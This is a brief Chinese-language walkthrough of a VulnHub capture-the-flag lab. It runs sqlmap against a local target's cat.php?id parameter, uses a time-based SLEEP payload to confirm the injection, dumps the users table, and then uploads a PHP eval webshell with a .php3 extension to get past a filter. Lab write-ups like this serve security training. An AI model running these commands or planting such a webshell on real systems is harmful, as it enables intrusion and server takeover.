vulnhub靶场From SQL injection to Shell
一、概括
- 通过基础潘顿和推测网页存在sql注入漏洞
- 验证存在漏洞
- 利用sql注入获得数据库中敏感数据,登录到网页管理员页面
- 发现存在文件上传漏洞
- 利用文件上传漏洞,获取服务器的信息
二、通关过程
- nmap获得靶机访问地址
通过靶机的mac地址和探测结果,得出靶机IP地址
浏览器访问地址
- 首页没有发现什么明显内容,访问其它网页发现存在特殊参数id,五i测存在sql漏洞,这里还发现了登录页面
- sqlmap探测漏洞
sqlmap-u"http://192.168.8.155/cat.php?id=1"--batch- 验真是否存在
id=2AND(SELECT5851FROM(SELECT(SLEEP(5)))nqWc)- 页面存在明显的延迟,那就是探测无误,存在sql注入
- 获取数据
sqlmap -u "http://192.168.8.155/cat.php?id=1" -D photoblog -T users --dump- 获得用户名密码,登录后台查看信息
页面存在文件上传,推测存在漏洞
创建一个文件试试看,写入
<?php eval($_POST['cmd']);?>- 直接上传发现提示,无法上传php文件,那试试php3等文件后缀
- 通过访问本页面的其它图片判断图片存放位置
- 蚁剑连接测试
- 连接成功,访问其它文件即可